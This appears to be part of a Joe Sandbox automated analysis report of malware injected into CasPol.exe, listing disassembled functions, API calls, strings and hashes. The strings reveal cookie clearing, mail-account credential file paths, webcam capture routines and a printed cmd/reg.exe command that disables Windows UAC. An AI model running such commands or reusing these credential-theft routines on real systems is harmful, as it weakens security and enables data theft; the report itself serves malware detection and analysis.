                                                                                                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                          • API String ID: 2018770650-304995407
                                                                                                                                                                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                                                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                                                          APIs
                                                                                                                                                                          • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                                                          • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                                                          • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prologSleep
                                                                                                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$XNG
                                                                                                                                                                          • API String ID: 3469354165-985523790
                                                                                                                                                                          • Opcode ID: ea398e5fe63a9b0ac4c6d9fe10c053d60d471deacd8251bb8fe61ead643a074b
                                                                                                                                                                          • Instruction ID: 7593a199e81997f2aad1dc538160579efde4e563a54277089fa649d8e7e3dbe8
                                                                                                                                                                          • Opcode Fuzzy Hash: ea398e5fe63a9b0ac4c6d9fe10c053d60d471deacd8251bb8fe61ead643a074b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A51E0B1A042106BCA14FB369D0A66E3655ABC4748F00443FFA09676E2DF7D8E46839E
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __cftoe
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4189289331-0
                                                                                                                                                                          • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                                                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                                                          • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                                                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                                                          APIs
                                                                                                                                                                          • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                          • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1922816806-0
                                                                                                                                                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3594823470-0
                                                                                                                                                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 493672254-0
                                                                                                                                                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                          • _free.LIBCMT ref: 004482CC
                                                                                                                                                                          • _free.LIBCMT ref: 004482F4
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                          • _abort.LIBCMT ref: 00448313
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                                                          • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                          • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                          • _free.LIBCMT ref: 10005B55
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                          • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                                                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                          • String ID: 0$MsgWindowClass
                                                                                                                                                                          • API String ID: 2877667751-2410386613
                                                                                                                                                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                          • API String ID: 2922976086-4183131282
                                                                                                                                                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
